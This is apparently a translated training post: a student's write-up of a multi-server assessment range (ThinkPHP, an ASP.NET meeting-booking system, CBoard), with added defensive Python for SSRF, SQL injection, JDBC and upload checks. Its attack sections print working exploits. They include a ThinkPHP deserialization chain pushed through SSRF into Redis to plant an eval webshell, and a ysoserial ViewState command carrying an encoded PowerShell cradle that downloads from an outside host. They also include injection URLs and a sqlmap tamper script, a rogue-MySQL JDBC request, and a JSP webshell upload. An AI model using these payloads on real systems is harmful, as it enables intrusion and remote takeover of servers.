Disclaimer: The text and information provided by this public account are for learning and research only and must not be used for any illegal purpose. We strongly condemn any illegal activity and strictly abide by laws and regulations. Readers should abide by laws and regulations of their own accord and must not use the information provided by this public account to engage in any illegal activity. This public account accepts no responsibility for any illegal conduct by readers.
Background
Over the past year 暗月 released many tutorials, for example on Java code auditing, .NET code auditing and PHP code auditing.
With the year ending it was time for a big assessment. Its purpose is to test how well students have learned, to let them discover their own weak points during the assessment, and to let them study in a more targeted way afterwards.
Contents of this assessment
The assessment uses an online target range with three servers and four FLAGs in total; capturing them all counts as passing.
The focus is on chaining multiple vulnerabilities to gain an initial foothold from the internet, testing everyone's ability to find and exploit vulnerabilities.
The main content covers Java, .NET and PHP code auditing, assessing how well everyone has mastered web security, and also includes Linux and Windows privilege escalation.
The assessment is entirely black-box: find the vulnerabilities, exploit them, and clear every stage.
Pass rate
100 people took part in this assessment and 8 passed, a pass rate of 8%, which matches expectations.
Below is one student's write-up of passing the assessment.
ThinkPHP
Reference: https://xz.aliyun.com/t/7594
Redis cache
A cached value whose string starts with think_serialize: is unserialized when it is read back with get.
Writing the script
First invert (bitwise NOT) the generated unserialize payload so that nothing goes wrong during transmission; because GET requests are length-limited, send it in segments and keep appending them with Redis's APPEND command; once appending is finished, invert it again with BITOP NOT to recover the complete unserialize data.
The one-shot exploitation script is below.
The unserialize PoC can be generated with phpggc.
<?php
// eval 1 > payload123123.php
$a = "think_serialize:";
$a = $a."O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A5%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22no%22%3Bi%3A1%3Bs%3A3%3A%22123%22%3B%7D%7Ds%3A9%3A%22%00%2A%00parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7D%7D%7D";
$originalString = urldecode($a);
// XOR every byte with 0xFF (bitwise NOT) so the bytes survive transport
$reversedString = '';
for ($i = 0; $i < strlen($originalString); $i++) {
    $reversedString .= $originalString[$i] ^ "\xFF";
}
// split into 10 chunks to stay under the GET length limit
$length = ceil(strlen($reversedString) / 10);
$segments = str_split($reversedString, $length);
$tmp_key = bin2hex(random_bytes(8));
$redis_ip = "127.0.0.1";
$server_ip = "103.164.63.172:8081";
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/config:set:slave-read-only:no";
echo file_get_contents($url);
// push each chunk into Redis through the SSRF endpoint with APPEND
foreach ($segments as $value) {
    $url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/APPEND:$tmp_key:".$value;
    echo file_get_contents($url);
}
// BITOP NOT restores the original bytes under the final key
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/bitop:not:payload12xx123:$tmp_key";
echo file_get_contents($url);
echo file_get_contents("http://$server_ip/public/index.php?s=index/Index/getname&name=payload12xx123");
echo "webshell:\npass:1\nhttp://$server_ip/public/payload123123.php";
?>
The flag can be found in the web root.
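The whole chain above only works because the geturl endpoint fetches any URL it is handed, including dict:// pointed at the local Redis. As an added example (not part of the student's write-up or of ThinkPHP), the Python below shows the two controls a defender would want: a guard for a server-side fetch parameter that allows only HTTP(S) and refuses hosts resolving to non-public addresses, and a detector that flags this Redis-over-SSRF pattern in web access logs. The log lines are constructed, modelled on the request shape in the script, and the resolver is injectable so the code runs offline.

```python
import ipaddress
import re
import socket
from urllib.parse import parse_qs, unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _default_resolver(host):
    # Check every address the name maps to, not just the first one.
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_fetch_url(url, resolver=_default_resolver):
    """Return (ok, reason) for a user-supplied URL the server is asked to fetch.

    Rejects non-HTTP schemes (dict://, gopher://, file:// ...) and any host
    that resolves to a loopback, private, link-local or other non-public
    address, which is what a server-side fetch must never be allowed to reach.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials embedded in url"
    try:
        addrs = resolver(parts.hostname)
    except OSError as exc:
        return False, f"dns failure: {exc}"
    for addr in addrs:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False, f"unexpected address form: {addr!r}"
        if not ip.is_global:
            return False, f"{parts.hostname} resolves to non-public {ip}"
    return True, "ok"


# Detection side: the write-up's traffic carries dict:// URLs aimed at port
# 6379 whose path spells out Redis commands separated by colons.
NON_HTTP_SCHEME = re.compile(r"\b(?:dict|gopher|file|ftp)://", re.I)
REDIS_CMD = re.compile(r"/(?:config|append|bitop|set|slaveof|save|flushall)[:\s]", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+)')


def flag_ssrf_in_log(line):
    """Return the reasons (possibly none) an access-log line looks like SSRF to Redis."""
    reasons = []
    m = REQUEST_LINE.search(line)
    if not m:
        return reasons
    query = urlsplit(m.group(1)).query
    for target in parse_qs(query).get("url", []):
        target = unquote(target)
        if NON_HTTP_SCHEME.search(target):
            reasons.append("non-http scheme in url parameter")
        if ":6379" in target:
            reasons.append("url parameter targets the redis port")
        if REDIS_CMD.search(target):
            reasons.append("redis command in url parameter")
    return reasons


def scan_log(lines):
    """Map line index -> reasons, for every line that raised at least one."""
    return {i: r for i, line in enumerate(lines) if (r := flag_ssrf_in_log(line))}


# Constructed sample log lines modelled on the request pattern in the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jan/2024:10:48:46 +0800] "GET /public/index.php?s=index/Index/geturl&url=dict://127.0.0.1:6379/config:set:slave-read-only:no HTTP/1.1" 200 12',
    '10.0.0.5 - - [28/Jan/2024:10:48:47 +0800] "GET /public/index.php?s=index/Index/geturl&url=dict://127.0.0.1:6379/APPEND:deadbeef:abcd HTTP/1.1" 200 12',
    '10.0.0.7 - - [28/Jan/2024:10:50:01 +0800] "GET /public/index.php?s=index/Index/geturl&url=https://example.com/feed.xml HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for idx, reasons in scan_log(SAMPLE_LOG).items():
        print(idx, reasons)
    print(is_safe_fetch_url("dict://127.0.0.1:6379/config:set:slave-read-only:no"))
```

The guard resolves the hostname itself rather than pattern-matching the string, so a DNS name that points at 127.0.0.1 or 10.x is caught the same way a literal address is; the fetch layer still has to pin the resolved address it checked, otherwise a rebinding name can pass the check and then resolve elsewhere.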
Meeting booking system
http://103.164.63.231/login.aspx  (meeting booking system)
Unauthenticated ViewState deserialization
References:
https://blog.csdn.net/qq_41891666/article/details/107290131
https://www.websecuritys.cn/index.php/archives/94/
The hidden ViewState fields can be observed on the login.aspx page.
After reading up on the technique online, I found that ysoserial.net can be used for the attack directly.
Running ./ysoserial.exe -p ViewState also prints the common usage.
Combined with the decryptionKey and validationKey taken from the web.config in the source code downloaded online, the complete payload can be constructed.
./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwA1AC4AMQA3ADgALgA3ADMALgAxADQAMQA6ADgAMAAxADEALwBhADEAMQAxACcAKQApACIA" --path="/login.aspx" --apppath="/" -decryptionkey="215D97F766DE50E575496E01C16306C751376E2EBBDE4B51" -validationkey="0BF11533BC55065E2C46C2F295FC5A501A13B28FE43B6F56E57973D4BE818354D21B7102EC24DB26B803D65936A5F1D812158D8F729406C168FC8440B4CDE16B" --islegacy
The beacon then came online directly.
After a Potato privilege escalation, the flag can be obtained under the administrator user.
Unauthenticated injection point 1
Here the incoming dt parameter is not filtered at all; appending ') to close the expression triggers SQL injection.
Exploitation
http://103.164.63.231/report/data_list.aspx?dt=2024-01-27%27);waitfor delay '0:0:5'--
Stacked queries work directly.
Unauthenticated injection point 2
This point takes its value from a cookie and first runs it through Helper.SimpleDecryptStr, a simple decryption routine.
It turns out to be nothing more than a simple string transformation.
We can write a tamper script that performs the injection easily.
The script:
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from urllib.parse import quote

__priority__ = PRIORITY.LOWEST


def dependencies():
    singleTimeWarnMessage("此脚本仅适用于 book_meeting")


def simple_encrypt_str(rs):
    # add 1 to every character code, then reverse the string
    by = [ord(char) + 1 for char in rs]
    encrypted_str = ''.join(chr(byte) for byte in reversed(by))
    return encrypted_str


def tamper(payload, **kwargs):
    return quote(simple_encrypt_str(payload))
sqlmap -u "http://103.164.63.231/wx/AutoLogin_Qywx.aspx" --level 3 --cookie="qywxusername=1" -p qywxusername --tamper=book_meeting_AutoLogin_Qywx.py --ignore-redirects --skip-urlencode
Unauthenticated injection point 3
This location is the same as the previous one: the incoming value is only simply encrypted, and exploitation is identical to the above.
It is located at
/dd/AutoLogin.aspx
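Injection points 2 and 3 share one root cause: the cookie value is "decrypted" with a reversible character shift and then used to build SQL text, so the transformation is no defence at all. The following Python is an added example, not code from the write-up or from the meeting-booking application; it reimplements the transform from the tamper script and its inverse (the decrypt side is assumed to mirror what Helper.SimpleDecryptStr does), then runs the same decrypted value through a string-concatenated query and a parameterised one against an in-memory SQLite table so the difference is visible.

```python
import sqlite3


def simple_encrypt_str(rs):
    # The transform the tamper script uses: +1 on every character, then reverse.
    return ''.join(chr(ord(c) + 1) for c in reversed(rs))


def simple_decrypt_str(enc):
    # Assumed inverse (reverse, then -1): this is all the server-side
    # Helper.SimpleDecryptStr can be doing if the tamper above works.
    return ''.join(chr(ord(c) - 1) for c in reversed(enc))


def _demo_db():
    # Constructed sample table standing in for the application's user table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, display TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "Alice"), ("bob", "Bob")])
    return conn


def autologin_concat(conn, cookie_value):
    # Vulnerable pattern: decrypted cookie text is spliced into the SQL string,
    # so quotes inside it change the query's structure.
    name = simple_decrypt_str(cookie_value)
    sql = "SELECT display FROM users WHERE username = '" + name + "'"
    return sorted(r[0] for r in conn.execute(sql))


def autologin_param(conn, cookie_value):
    # Hardened pattern: identical decryption, but the value is bound as a
    # parameter and can only ever be compared as data.
    name = simple_decrypt_str(cookie_value)
    rows = conn.execute("SELECT display FROM users WHERE username = ?", (name,))
    return sorted(r[0] for r in rows)


def demo():
    """Run both handlers on an honest cookie and on a tautology payload."""
    conn = _demo_db()
    honest = simple_encrypt_str("alice")
    hostile = simple_encrypt_str("x' OR '1'='1")   # classic tautology, for contrast only
    return {
        "roundtrip": simple_decrypt_str(honest),
        "concat_honest": autologin_concat(conn, honest),
        "concat_hostile": autologin_concat(conn, hostile),
        "param_honest": autologin_param(conn, honest),
        "param_hostile": autologin_param(conn, hostile),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

On the wire the cookie is additionally URL-encoded (the tamper calls quote), which the web framework undoes before the handler sees it; it is omitted here because it changes nothing about the outcome. The fix for all three injection points is the parameterised form, independent of what obfuscation is layered on top.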
Separated web and database servers
Because stacked injection exists, xp_cmdshell can be used directly to execute system commands; sqlmap --os-shell does this in one step.
Then bring it online in CS; finally the flag can be obtained under users.
CBoard
http://103.164.63.172:8090
The default credentials admin / root123 get into the backend.
JDBC reverse shell
From the source code obtained on GitHub, the pom.xml tells us the database version, and CC6 is very likely usable. The project https://github.com/fnmsd/MySQL_Fake_Server is used to build the evil server.
The final raw HTTP request:
POST /dashboard/test.do HTTP/1.1
Host: 103.164.63.172:8090
Content-Length: 403
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://39.101.184.7:8026
Referer: http://39.101.184.7:8026/cboard/starter.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=351888835121736C4B575BE0B49F2DDA
Connection: close

datasource=%7B%22config%22%3A%7B%22pooled%22%3Atrue%2C%22driver%22%3A%22com.mysql.jdbc.Driver%22%2C%22jdbcurl%22%3A%22jdbc%3Amysql%3A%2F%2F175.178.73.141%3A3306%2Ftest%3FautoDeserialize%3Dtrue%26user%3Dbase64ZGVzZXJfQ0MzMV9pZA%3D%3D%22%2C%22username%22%3A%22CommonsCollections6%22%2C%22password%22%3A%22123456%22%7D%2C%22type%22%3A%22jdbc%22%2C%22name%22%3A%22test%22%7D&query=%7B%22sql%22%3A%221%22%7D
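The request above lets a logged-in user hand the application a complete JDBC URL, including Connector/J properties such as autoDeserialize and an arbitrary host, which is what makes a hostile MySQL server useful. As an added example (not CBoard's code), the Python below parses that same form body and validates the datasource the way a server-side allowlist should: driver from a fixed set, host from a fixed set, and a denylist of Connector/J client properties that must never be user-controlled. The allowed host name is an assumption standing in for the real database host; the property names are real Connector/J options.

```python
import json
from urllib.parse import parse_qs, urlsplit

ALLOWED_DRIVERS = {"com.mysql.jdbc.Driver", "com.mysql.cj.jdbc.Driver"}
ALLOWED_HOSTS = {"db.internal.example"}   # assumption: the application's real DB host(s)
# Connector/J properties that let the server side of the connection drive
# deserialization, local file reads or interceptors on the client; compared
# case-insensitively because the driver accepts them that way.
DANGEROUS_PROPS = {
    "autodeserialize", "allowloadlocalinfile", "allowurlinlocalinfile",
    "allowmultiqueries", "statementinterceptors", "queryinterceptors",
    "detectcustomcollations",
}


def parse_jdbc_mysql(jdbcurl):
    """Split jdbc:mysql://host:port/db?k=v into (host, port, db, {lower-key: [values]})."""
    if not jdbcurl.lower().startswith("jdbc:mysql://"):
        raise ValueError("not a jdbc:mysql url")
    parts = urlsplit(jdbcurl[len("jdbc:"):])
    props = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return parts.hostname, parts.port, parts.path.lstrip("/"), props


def check_datasource(ds):
    """Return a list of policy violations; an empty list means the datasource is acceptable."""
    problems = []
    cfg = ds.get("config", {})
    if cfg.get("driver") not in ALLOWED_DRIVERS:
        problems.append(f"driver not allowed: {cfg.get('driver')!r}")
    try:
        host, _port, _db, props = parse_jdbc_mysql(cfg.get("jdbcurl", ""))
    except ValueError as exc:
        return [str(exc)] + problems
    if host not in ALLOWED_HOSTS:
        problems.append(f"host not allowed: {host!r}")
    bad = sorted(DANGEROUS_PROPS & set(props))
    if bad:
        problems.append("dangerous properties: " + ", ".join(bad))
    if "user" in props or "password" in props:
        # Credentials belong in the dedicated username/password fields, where
        # they can be audited; a url-embedded user= is a sign of tampering.
        problems.append("credentials must not be passed inside the url")
    return problems


def check_request_body(body):
    """Validate the datasource JSON carried in an x-www-form-urlencoded body."""
    ds = json.loads(parse_qs(body)["datasource"][0])
    return check_datasource(ds)


# The form body from the write-up's request, used here as the sample input.
SAMPLE_BODY = (
    "datasource=%7B%22config%22%3A%7B%22pooled%22%3Atrue%2C%22driver%22%3A%22com.mysql.jdbc.Driver%22%2C"
    "%22jdbcurl%22%3A%22jdbc%3Amysql%3A%2F%2F175.178.73.141%3A3306%2Ftest%3FautoDeserialize%3Dtrue%26user%3D"
    "base64ZGVzZXJfQ0MzMV9pZA%3D%3D%22%2C%22username%22%3A%22CommonsCollections6%22%2C%22password%22%3A%22123456%22%7D"
    "%2C%22type%22%3A%22jdbc%22%2C%22name%22%3A%22test%22%7D&query=%7B%22sql%22%3A%221%22%7D"
)

if __name__ == "__main__":
    for p in check_request_body(SAMPLE_BODY):
        print("reject:", p)
```

Rejecting on any violation is the right default here; a safer design removes the free-form URL field altogether and lets the user pick only from datasources an administrator has already configured.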
Authenticated arbitrary file upload
There is another spot that allows arbitrary file upload.
As the source code above shows, the whole upload process is plain string concatenation with no handling of the file extension at all; the target's middleware is Tomcat, so an arbitrary JSP webshell can be uploaded and the site taken over.
Raw HTTP:
POST /dashboard/uploadImage.do HTTP/1.1
Host: 103.164.63.172:8090
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=FBC699B01EC74F0154B6ECF2EF00953B
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Length: 181

------WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: image/png

1
------WebKitFormBoundaryY32jx5xlw76vxXzj--
Finally, the full concatenated path can be worked out from the source code:
http://103.164.63.172:8090/imgs/cockpit/upload/20240128104846/2.jsp
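The upload handler trusts the client-supplied filename, so the declared Content-Type of image/png and a .jsp name coexist without complaint and the file lands under a predictable timestamped directory. The Python below is an added example, not CBoard's code, contrasting that concatenation pattern with a hardened image-upload check: last path component only, extension allowlist, magic-byte check against the declared extension (the client's Content-Type header is ignored as untrustworthy), a server-generated random name, and a final containment check against the upload root. The upload root path is an assumption.

```python
import os
import secrets
from pathlib import Path, PurePosixPath

UPLOAD_ROOT = Path("/var/app/imgs/cockpit/upload")   # assumption: server-side upload directory

# extension -> leading bytes the file content must actually start with
ALLOWED_IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


class UploadRejected(ValueError):
    pass


def unsafe_upload_path(root, client_filename, timestamp_dir):
    # The pattern the write-up exploits: directory + client name, nothing checked.
    return f"{root}/{timestamp_dir}/{client_filename}"


def validate_image_upload(client_filename, data):
    """Return a server-chosen safe filename for the content, or raise UploadRejected."""
    # Keep only the last path component so ../ and Windows drive prefixes are dropped.
    name = PurePosixPath(client_filename.replace("\\", "/")).name
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_IMAGE_MAGIC:
        raise UploadRejected(f"extension not allowed: {ext or '(none)'}")
    if not data.startswith(ALLOWED_IMAGE_MAGIC[ext]):
        raise UploadRejected("content does not match the declared image type")
    # Never reuse the client name: a random server-side name with the
    # validated extension removes any influence over what gets served.
    return secrets.token_hex(16) + ext


def safe_upload_path(root, client_filename, data, timestamp_dir):
    """Full destination path for a validated upload, guaranteed to sit under root."""
    dest = (root / timestamp_dir / validate_image_upload(client_filename, data)).resolve()
    if root.resolve() not in dest.parents:
        raise UploadRejected("destination escapes the upload root")
    return dest


if __name__ == "__main__":
    # Constructed sample: the write-up's filename and body, then a genuine PNG header.
    print(unsafe_upload_path(UPLOAD_ROOT, "2.jsp", "20240128104846"))
    try:
        validate_image_upload("2.jsp", b"1")
    except UploadRejected as exc:
        print("rejected:", exc)
    png = b"\x89PNG\r\n\x1a\n" + bytes(8)
    print(safe_upload_path(UPLOAD_ROOT, "..\\..\\logo.png", png, "20240128104846"))
```

Serving the upload directory with script execution disabled (or from a separate static host) is the matching second layer: even if a check is bypassed, nothing under that path should be interpretable by Tomcat.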
For penetration testing training, contact 暗月.